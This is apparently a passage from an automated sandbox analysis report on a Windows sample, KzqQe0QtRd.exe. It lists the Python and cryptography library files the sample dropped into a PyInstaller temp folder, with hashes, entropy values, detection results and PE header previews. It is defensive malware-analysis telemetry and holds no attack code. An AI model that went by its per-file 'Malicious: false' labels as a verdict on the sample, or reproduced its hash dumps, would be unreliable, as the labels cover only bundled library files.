Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.&...H...H...H.......H.I.I...H.M.I...H...I.#.H.I.M...H.I.L...H.I.K...H..@...H..H...H......H..J...H.Rich..H.................PE..d....Ded.........." ..."............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_portable.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.015378888018285
Encrypted:	false
SSDEEP:	192:IF/1nb2eqCQtks0iiNqdF4mtPjD0wA5LPYcqgYvEL2x:i2P6fFA/4GjD4cgYvEL2x
MD5:	287B0A3E9E9E239AFB9DFDCC091FF9D1
SHA1:	3358321AB2D11D40DE5935CF037AC8F5B6D36743
SHA-256:	A66196465C839EC6EB287615942D40F0088DFEB67EE88DDBCE3ED955829AE865
SHA-512:	FE1CBEC71296B1E880CFB3F2D17BF3325FCFBCAC070FDCD7EE765086AC31C563E75BEB8C6E1051192DDAE91DE34B83CC4CBF38757FB9789D8E015889D5494E48
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.....................@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_keccak.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.257004239383687
Encrypted:	false
SSDEEP:	384:UzP2T9FRjRskTdf4YBU7YP5yUYDK1give:3HlRl57IC8UYDKG
MD5:	8C492646F16229D670058D843073ABED
SHA1:	EDD6B423B634C8C2B8A03256B5F0E024588943F5
SHA-256:	A0CED8DB859C74BF49B76C111089A2E3288EFBC4FD421A7A8CA844B5F784023E
SHA-512:	DFF9CC442038C5F3840041A636EEBEA0A6BD147FE3605461D58B361B18622F7ABA208A61B9C29ACE542137AA4E397984226DACDB0365D21CB3949D0F855BEA26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.%Y.pK..pK..pK......pK.A.J..pK.E.J..pK..pJ.(pK.A.N..pK.A.O..pK.A.H..pK...C..pK...K..pK......pK...I..pK.Rich.pK.................PE..d....Ded.........." ...". ... ......P.....................................................`.........................................`9......T:..d....`.......P..p............p..,....3...............................2..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..p....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_poly1305.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.124344463929253
Encrypted:	false
SSDEEP:	192:UI/ZNGfqDgvUh43G6coX2SSwmPL4V7wTdDlX1Y2cqgWjvE:U7FMhuGGF2L4STdDfYWgWjvE
MD5:	5C0223D9CDBFCC81F71DCB01F2BC850E
SHA1:	9F630621B9F3846C1D0FD8B9C48669401C832408
SHA-256:	C435C3819A3B628D6D61A08DA59D58759AE1EEFCDCEE894BBC06EA919E35BC8A
SHA-512:	EF3E105450744C2F606AA8B90107FF5D1183C9A2DDDDE52D430E1469C1A16090806A05954A3C65B601DD79B26C65CD5849D97FDA10F23CF2D4173CBA859C0F33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.%Y.pK..pK..pK......pK.A.J..pK.E.J..pK..pJ.(pK.A.N..pK.A.O..pK.A.H..pK...C..pK...K..pK......pK...I..pK.Rich.pK.................PE..d....Ded.........." ..."..... ......P.....................................................`......................................... 9.......9..d....`.......P..\|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..\|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Math\_modexp.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.932926973296686
Encrypted:	false
SSDEEP:	768:9b+5FzhqrxS7yZAEfYcwcSPxpMgLp/GQNlpcVaGZ:9b+59wc7OAEfYcwJxpMgFJM
MD5:	F1977E4B909D83A690FB69B60F7A66B6
SHA1:	B16A02C4A42B667F8504FD92BABB57F39E2BCAF6
SHA-256:	AFADEFE850BE0B44E4EC05DD048E6CF6CF181B0DEB6BB3ADDABEF95D20E43E52
SHA-512:	72DDD28633E7B258FB2FC6521809A8FADBCDA8890A678A87AEB590384EC05AE8451E74CF45B72705D419E019C0EA46778933243CC06F04235A63711882CE8F86
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\|N../N../N../G.Q/H../....L../....M../N../e../....B../....F../....M../....L../....O../..=/O../....O../RichN../........PE..d....Ded.........." ...".\..........`.....................................................`..........................................~..d...$...d...............................,....s...............................q..@............p..(............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data................t..............@....pdata...............~..............@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Protocol\_scrypt.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.795317235666895
Encrypted:	false
SSDEEP:	192:kJkCffqPSTMeAk4OeR64ADp5i6RcqgO5vE:kXZMcPeR64ADu63gO5vE
MD5:	ACD58F05EF429D4D85163B98B26A2307
SHA1:	CCDF4A294B2E05B5E16784BAE562BFDB474308A0
SHA-256:	BB2BE221531D66EC5E6EF026F5548749430A785FD1FA1C1BECB12375C0CA6D1D
SHA-512:	4CC272B161A7EA35E45274D2FB1358104F9BED5A7B460F1DC094C48AD834D94D779E73362C4E4CA3F3B7FEAE4DA9812B5CD5F5EDF7683668043A7C62B853A0D8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B................;.....I.......M...........!...I.......I.......I......................W............Rich....................PE..d....Ded.........." ..."............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ec_ws.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754176
Entropy (8bit):	7.628477920546159
Encrypted:	false
SSDEEP:	12288:ZmqIHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hkcO:8qIHoxJFf1p34hcrn5Go9yQO66
MD5:	1D952BDA595A7A098CAED84384785C6A
SHA1:	4D894A8B9DA757EE5BAEB42B93D3536FEA4FC27C
SHA-256:	7A38DD5891A1D357FEF6A90D74E6D55C51C0ADC7B13563279FAE0671D9557E53
SHA-512:	0B12C993F3F34044876FE1A17E7198DC99C1E9723A1E32D2937D1A986103494BFD930410303854D6C5A4D8BA206CE8E02A093C6C7ACF2572C9A0F393D702833C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j......L...L...L'.#L(..La.M,..Le.M-..L...L...La.M"..La.M&..La.M-..L..M+..L..M/..L..OL/..L..M/..LRich...L........PE..d....Ded.........." ...".n..........`.....................................................`..........................................p..d...dq..d...............$...............4...@Z...............................Y..@...............(............................text...Xm.......n.................. ..`.rdata...............r..............@..@.data...x............h..............@....pdata..$............p..............@..@.rsrc................~..............@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed25519.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	5.791540389396949
Encrypted:	false
SSDEEP:	384:RRwirFzOF2MZz1n0/kyTMIl9bhgIW0mvBaeoSzra2pftjGQDdsH0MgkbQ0e1r:/LJI2MTeM+9dmvBaeoCtaQDzkf
MD5:	73B612EB7DFA001B9B83B32717FA1ED1
SHA1:	F1C41492360C6134E24BDEF9032937A080A985CB
SHA-256:	C176A7D9EB79CF8DBAFEB63A7BB6319C7E3504CB6DE6A2191BA9802852AFFACC
SHA-512:	35B72F2911FB4B339273279B4E45DB19E55F2D5B86EB565DC92AE0DAA38829F1266C8D74CED2EA854124B86891C2099AAB2FF49312280214964A69F5941DF4EB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J..Y.p...p...p.......p..A....p..E....p...p..)p..A....p..A....p..A....p.......p.......p....t..p.......p..Rich.p..........PE..d....Ded.........." ...".F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text....D.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed448.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	6.059437003674215
Encrypted:	false
SSDEEP:	1536:WqvnErJyGoqQXZKfp23mXKUULBeCFTUCqHF+PELb7MSAEfnctefBE5:WqvnErJyGoqQXZKfp2ayLsCFTUCqHEPV
MD5:	D2C14199DFB445ED48F29408292B6D50
SHA1:	932CBF29BE7241D5871F4BD924FD21ACEC752FF7
SHA-256:	C45A5087F009FC59B71A01CA4A592883140071BC8C42077DDB7B89DE136D7BB0
SHA-512:	3F9D87EFBD06D44256CCDB96646BEA46A9A7E26C1A78E3E77D1097CF2D6D988012318512175A9592A8F55E17136182851258C9EB192DE04A18A0F1BC5E3EC95F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\|N../N../N../G.Q/H../....L../....M../N../e../....B../....F../....M../....L../....O../..=/O../....O../RichN../........PE..d....Ded.........." ...".....8......`........................................@............`.............................................h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..j...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_x25519.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.494356436323832
Encrypted:	false
SSDEEP:	96:mMWpVVdJvbrqTuy/Th/Y0IluLfcC75JiC4cs89EfqADShDsAbcX6gn/7EC:mMsVddiTHThQTctdErDqDsicqgn/7
MD5:	16E75FC29DB0FA934EC1FA93838B89AE
SHA1:	0EC593B6EDA40F0654BB5032BF7F7806C5E8914C
SHA-256:	FA59EC8582807D76EE6627C26C0B57CC4CD88E3DCC307BE1C1ED56F0C63E7820
SHA-512:	DC1CB42F3A094AC84805408A2906407D7B387788200DAB5DBBE4FDC09F02B11F687ECF2D8BC18759390775E532F73250653D8CBB9BF91C997B7C0C09FCEF32F8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6!..WO.WO.WO./..WO..+N.WO../N.WO.WN.WO..+J.WO..+K.WO..+L.WO.R+G.WO.R+O.WO.R+..WO.R+M.WO.Rich.WO.................PE..d....Ded.........." ..."............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_cpuid_c.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.7372077697895945
Encrypted:	false
SSDEEP:	192:zWVddiTHThQTctEEaEDKDvMRWJcqgbW6:SMdsc+EaEDKDvCWvgbW
MD5:	1831CB26FD8EE2B0AB0496F80272FC04
SHA1:	BC8E78CC005859F7272C3615A3774BA7D687F0F4
SHA-256:	D830D77669527129BF3D10929AAD1CC9EE5E44A9594E3FC651D3B5BC01C42C44
SHA-512:	DF51D636A277C8AD83C90AE99A824F77C441DA5C7B08A11C3D8752CD3661096EBF327008951CA97B4BAF9632B2CA16DF34A9F3E43BF837C8556BCB3C304BB2CC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6)..WG.WG.WG./..WG..+F.WG../F.WG.WF.WG..+B.WG..+C.WG..+D.WG.R+O.WG.R+G.WG.R+..WG.R+E.WG.Rich.WG.........PE..d....Ded.........." ..."............P........................................p............`..........................................'..\|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_strxor.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.693475725745118
Encrypted:	false
SSDEEP:	96:zuZVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EMz3DVWMot4BcX6gbW6O:zUVddiTHThQTctEEO3DloKcqgbW6
MD5:	3AF448B8A7EF86D459D86F88A983EAEC
SHA1:	D852BE273FEA71D955EA6B6ED7E73FC192FB5491
SHA-256:	BF3A209EDA07338762B8B58C74965E75F1F0C03D3F389B0103CC2BF13ACFE69A
SHA-512:	BE8C0A9B1F14D73E1ADF50368293EFF04AD34BDA71DBF0B776FFD45B6BA58A2FA66089BB23728A5077AB630E68BF4D08AF2712C1D3FB7D79733EB06F2D0F6DBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6)..WG.WG.WG./..WG..+F.WG../F.WG.WF.WG..+B.WG..+C.WG..+D.WG.R+O.WG.R+G.WG.R+..WG.R+E.WG.Rich.WG.........PE..d....Ded.........." ..."............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109440
Entropy (8bit):	6.642252418996898
Encrypted:	false
SSDEEP:	1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
MD5:	49C96CECDA5C6C660A107D378FDFC3D4
SHA1:	00149B7A66723E3F0310F139489FE172F818CA8E
SHA-256:	69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
SHA-512:	E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..\|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..\|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65304
Entropy (8bit):	6.187244032149753
Encrypted:	false
SSDEEP:	1536:92icaMc9076gzE6+gTKnEzRIsOnev7SyP4xw:92icrclGE6+gTOEzRIsOn2V
MD5:	511A52BCB0BD19EDA7AA980F96723C93
SHA1:	B11AB01053B76EBB60AB31049F551E5229E68DDD
SHA-256:	D1FB700F280E7793E9B0DCA33310EF9CD08E9E0EC4F7416854DFFAF6F658A394
SHA-512:	D29750950DB2ECBD941012D7FBDD74A2BBD619F1A92616A212ACB144DA75880CE8A29EC3313ACBC419194219B17612B27A1833074BBBAA291CDB95B05F8486FF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.i..i..i......i.v.h..i.v.l..i.v.m..i.v.j..i...h..i...h..i..h.V.i...d..i...i..i.....i...k..i.Rich.i.........................PE..d....k.d.........." ...$.R..........`...............................................'.....`.............................................P...`...d......................../..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84760
Entropy (8bit):	6.571366239395909
Encrypted:	false
SSDEEP:	1536:+O1z7poK78xa5yp6aclDqGihM8Vh948L5IsCVQ7SyhxG:31z9h9plDshvVhH5IsCVQk
MD5:	4438AFFAAA0CA1DF5B9B1CDAA0115EC1
SHA1:	4EDA79EAF3DE614D5F744AA9EEA5BFCF66E2D386
SHA-256:	EC91E2B4BACA31B992D016B84B70F110CE2B1B2DFD54F5E5BEF6270ED7D13B85
SHA-512:	6992107AC4D2108E477BC81AF667B8B8E5439231E7E9F4B15CE4BCE1AEEA811BC0F1AAA438BE3B0E38597760CB504367512809EE1937C4B538A86724AE543BA6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B......B.i.C...B.i.....B.i.G...B.i.F...B.i.A...B..C...B..C...B...C..B..O...B..B...B......B..@...B.Rich..B.........................PE..d....k.d.........." ...$.....^...............................................P......2.....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181760
Entropy (8bit):	6.176962076839488
Encrypted:	false
SSDEEP:	3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
MD5:	FDE9A1D6590026A13E81712CD2F23522
SHA1:	CA99A48CAEA0DBACCF4485AFD959581F014277ED
SHA-256:	16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
SHA-512:	A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	123672
Entropy (8bit):	6.0603476725812415
Encrypted:	false
SSDEEP:	3072:T7u5LnIxdP3fPHW+gfLIhAxKpemWtIsLPKlY:Tw+3FgfLIhFemWeY
MD5:	6114277C6FC040F68D25CA90E25924CD
SHA1:	028179C77CB3BA29CD8494049421EAA4900CCD0E
SHA-256:	F07FE92CE85F7786F96A4D59C6EE5C05FE1DB63A1889BA40A67E37069639B656
SHA-512:	76E8EBEFB9BA4EA8DCAB8FCE50629946AF4F2B3F2F43163F75483CFB0A97968478C8AAEF1D6A37BE85BFC4C91A859DEDA6DA21D3E753DAEFE084A203D839353D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...M.".B......F......H......L......@...^..F......E......B......G...D.......^..B...^..E...^.N.E...^..E...RichD...........PE..d....k.d.........." ...$............p\..............................................[.....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	253720
Entropy (8bit):	6.554150968006557
Encrypted:	false
SSDEEP:	6144:3V9E1CyOa72oP+pG1/dgD09qWM53pLW1ADDtLRO75e:jEgyOa72jw1/d4VVhLE5e
MD5:	BE315973AFF9BDEB06629CD90E1A901F
SHA1:	151F98D278E1F1308F2BE1788C9F3B950AB88242
SHA-256:	0F9C6CC463611A9B2C692382FE1CDD7A52FEA4733FFAF645D433F716F8BBD725
SHA-512:	8EA715438472E9C174DEE5ECE3C7D9752C31159E2D5796E5229B1DF19F87316579352FC3649373DB066DC537ADF4869198B70B7D4D1D39AC647DA2DD7CFC21E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.`...`...`.......`..,....`..,....`..,....`..,....`.......`.......`...`...`.......`.......`.......`....r..`.......`..Rich.`..........................PE..d....k.d.........." ...$.x...<......\|...............................................>.....`.........................................0T..P....T...................'......./......P.......T...........................p...@............................................text...-w.......x.................. ..`.rdata..\|............\|..............@..@.data....*...p...$...T..............@....pdata...'.......(...x..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65304
Entropy (8bit):	6.256836184121913
Encrypted:	false
SSDEEP:	1536:nfKlLLgy209/MkZy6nR3JZlivy7OjZopRIsOI/7SyAxn4:fKBgy+IZlh7OjSpRIsOI/M4
MD5:	1524882AF71247ADECF5815A4E55366A
SHA1:	E25014C793C53503BDFF9AF046140EDDA329D01B
SHA-256:	6F7742DFDD371C39048D775F37DF3BC2D8D4316C9008E62347B337D64EBED327
SHA-512:	5B954BB7953F19AA6F7C65AD3F105B77D37077950FB1B50D9D8D337BDD4B95343BAC2F4C9FE17A02D1738D1F87EEEF73DBBF5CDDDCB470588CBC5A63845B188A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,'@.MI..MI..MI..5...MI.:3H..MI.:3L..MI.:3M..MI.:3J..MI..2H..MI..5H..MI.G0H..MI..MH..MI..2D..MI..2I..MI..2...MI..2K..MI.Rich.MI.........PE..d....l.d.........." ...$.T...~......@@...............................................7....`............................................P... ............................/......X...P}..T............................\|..@............p..0............................text....S.......T.................. ..`.rdata...O...p...P...X..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	159000
Entropy (8bit):	6.8491410545695715
Encrypted:	false
SSDEEP:	3072:2tZVL5rdV/REWWjAYyznf49mNo+RRApqc5IsZ1v8N:2tZV3pREMAYO+ElG
MD5:	737119A80303EF4ECCAA998D500E7640
SHA1:	328C67C6C4D297AC13DA725BF24467D8B5E982E3
SHA-256:	7158C1290AC29169160B3EC94D9C8BCDE4012D67A555F325D44B418C54E2CC28
SHA-512:	1C9920E0841A65B01A0B339C5F5254D1039EF9A16FE0C2484A7E2A9048727F2CC081817AA771B0C574FB8D1A5A49DC39798A3C5E5B5E64392E9C168E1827BE7C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..'..lt..lt..lt...t..lt..mu..lt..iu..lt..hu..lt..ou..lt..mu..ltM.mu..lt..mt`.lt..au<.lt..lu..lt..t..lt..nu..ltRich..lt................PE..d....l.d.........." ...$.b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text...za.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	34584
Entropy (8bit):	6.410940768849398
Encrypted:	false
SSDEEP:	768:hXI6RwgJ5xeDTdywGnJ8BIsWt6F5YiSyvWKAMxkE9:pIoJ5UDTdywGJ8BIsWt6L7SyuoxB
MD5:	2CA9FE51BF2EE9F56F633110A08B45CD
SHA1:	88BA6525C71890A50F07547A5E9EAD0754DD85B9
SHA-256:	1D6F1E7E9F55918967A37CBD744886C2B7EE193C5FB8F948132BA40B17119A81
SHA-512:	821551FA1A5AA21F76C4AE05F44DDD4C2DAA00329439C6DADC861931FA7BD8E464B4441DFE14383F2BB30C2FC2DFB94578927615B089A303AA39240E15E89DE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G.*.&.y.&.y.&.y.^.y.&.yFX.x.&.yFX.x.&.yFX.x.&.yFX.x.&.y.Y.x.&.y.&.y.&.y.^.x.&.y.Y.x.&.y.Y.x.&.y.Y}y.&.y.Y.x.&.yRich.&.y........PE..d....k.d.........." ...$.....<......0.....................................................`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
